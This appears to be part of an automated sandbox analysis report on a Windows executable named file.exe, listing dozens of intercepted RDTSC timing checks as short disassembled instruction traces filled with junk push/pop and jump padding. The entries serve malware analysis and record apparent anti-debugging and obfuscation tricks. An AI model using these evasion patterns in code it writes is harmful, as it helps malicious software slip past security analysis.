    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7DA3 second address: 7B7DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC83451D8AEh 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FC83451D8B1h 0x00000011 movzx ecx, si 0x00000014 lea eax, dword ptr [ebp+124767DCh] 0x0000001a mov dword ptr [ebp+124473F4h], ecx 0x00000020 nop 0x00000021 js 00007FC83451D8B2h 0x00000027 jnp 00007FC83451D8ACh 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007FC83451D8AAh 0x00000034 pushad 0x00000035 push eax 0x00000036 pop eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7DFC second address: 796AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jnc 00007FC834EB3D4Bh 0x0000000d call dword ptr [ebp+122D26E2h] 0x00000013 push esi 0x00000014 jmp 00007FC834EB3D57h 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796AF6 second address: 796AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52C7 second address: 7E5327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC834EB3D57h 0x0000000a jmp 00007FC834EB3D4Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jg 00007FC834EB3D46h 0x00000019 jp 00007FC834EB3D46h 0x0000001f jmp 00007FC834EB3D56h 0x00000024 popad 0x00000025 jmp 00007FC834EB3D51h 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5327 second address: 7E533B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83451D8AAh 0x00000008 jo 00007FC83451D8B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E533B second address: 7E5341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E546E second address: 7E5474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5474 second address: 7E549E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D4Eh 0x00000009 popad 0x0000000a jg 00007FC834EB3D48h 0x00000010 pushad 0x00000011 jmp 00007FC834EB3D4Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E549E second address: 7E54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5882 second address: 7E588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E588B second address: 7E589D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83451D8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FC83451D8ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E589D second address: 7E58A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5A27 second address: 7E5A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FC83451D8A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5A34 second address: 7E5A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC834EB3D54h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FC834EB3D4Ch 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5B97 second address: 7E5B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF49E second address: 7EF4BB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC834EB3D48h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FC834EB3D46h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE10A second address: 7EE11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC83451D8A6h 0x0000000f js 00007FC83451D8A6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE5E1 second address: 7EE5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007FC834EB3D46h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA6B second address: 7EEA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA6F second address: 7EEA7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC834EB3D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA7D second address: 7EEA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA81 second address: 7EEA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA8D second address: 7EEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEA92 second address: 7EEA9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FC834EB3D46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEBC4 second address: 7EEBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4817 second address: 7F4847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC834EB3D6Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC834EB3D55h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4E50 second address: 7F4E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4FAA second address: 7F4FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC834EB3D46h 0x0000000a popad 0x0000000b pop edi 0x0000000c jo 00007FC834EB3D58h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F44E1 second address: 7F450C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8AAh 0x00000009 jp 00007FC83451D8AEh 0x0000000f jl 00007FC83451D8A8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F450C second address: 7F452D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC834EB3D52h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F452D second address: 7F4546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a pushad 0x0000000b jne 00007FC83451D8A6h 0x00000011 jnl 00007FC83451D8A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4546 second address: 7F454C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5236 second address: 7F5251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8B4h 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776B4C second address: 776B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776B50 second address: 776B7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83451D8A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC83451D8B8h 0x00000014 jp 00007FC83451D8A6h 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776B7E second address: 776B99 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC834EB3D4Eh 0x00000008 pushad 0x00000009 jbe 00007FC834EB3D46h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB3D9 second address: 7FB3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB3DE second address: 7FB3F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC834EB3D53h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB3F7 second address: 7FB3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB3FB second address: 7FB3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB844 second address: 7FB848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB848 second address: 7FB851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF1FC second address: 7FF21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8B5h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jp 00007FC83451D8A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF21F second address: 7FF237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC834EB3D4Bh 0x0000000c jo 00007FC834EB3D46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF237 second address: 7FF250 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC83451D8ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF250 second address: 7FF26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D55h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF26A second address: 7FF272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF272 second address: 7FF278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3B9 second address: 7FF3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3BD second address: 7FF3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3D6 second address: 7FF3DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3DF second address: 7FF3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007FC834EB3D4Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3EF second address: 7FF3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF3FB second address: 7FF3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805BBD second address: 805BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805BC1 second address: 805BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804C44 second address: 804C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B76EE second address: 7B76F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B76F4 second address: 7B76F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804EE0 second address: 804EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8081AD second address: 8081B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8081B1 second address: 8081D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D55h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC834EB3D46h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808355 second address: 808359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808359 second address: 80838D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC834EB3D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FC834EB3D52h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC834EB3D51h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80838D second address: 808391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808391 second address: 808397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808397 second address: 8083AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007FC83451D8A6h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8083AB second address: 8083AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80850E second address: 808521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FC83451D8ACh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808521 second address: 808526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808526 second address: 808541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007FC83451D8A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC83451D8A6h 0x00000015 jns 00007FC83451D8A6h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808839 second address: 808843 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC834EB3D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808843 second address: 80884F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC83451D8B7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BB45 second address: 80BB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BB4E second address: 80BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8ACh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BFD4 second address: 80BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C152 second address: 80C158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C2A1 second address: 80C2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81282A second address: 812835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812835 second address: 81283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81283B second address: 81283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8129A6 second address: 8129B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FC834EB3D4Ch 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8129B7 second address: 8129E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC83451D8ADh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8129E0 second address: 8129F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FC834EB3D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813359 second address: 8133A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC83451D8A6h 0x0000000a jnp 00007FC83451D8A6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007FC83451D8B4h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FC83451D8BDh 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8133A0 second address: 8133A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8133A8 second address: 8133AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813681 second address: 813685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813685 second address: 813689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776B8A second address: 776B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007FC834EB3D46h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813F46 second address: 813F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8AEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813F58 second address: 813F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813F5C second address: 813F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CB4D second address: 76CB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D4Ah 0x00000009 jmp 00007FC834EB3D51h 0x0000000e popad 0x0000000f jne 00007FC834EB3D48h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819B35 second address: 819B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FC83451D8ABh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f ja 00007FC83451D8A6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push ecx 0x00000019 jmp 00007FC83451D8ADh 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007FC83451D8AEh 0x0000002a rdtsc
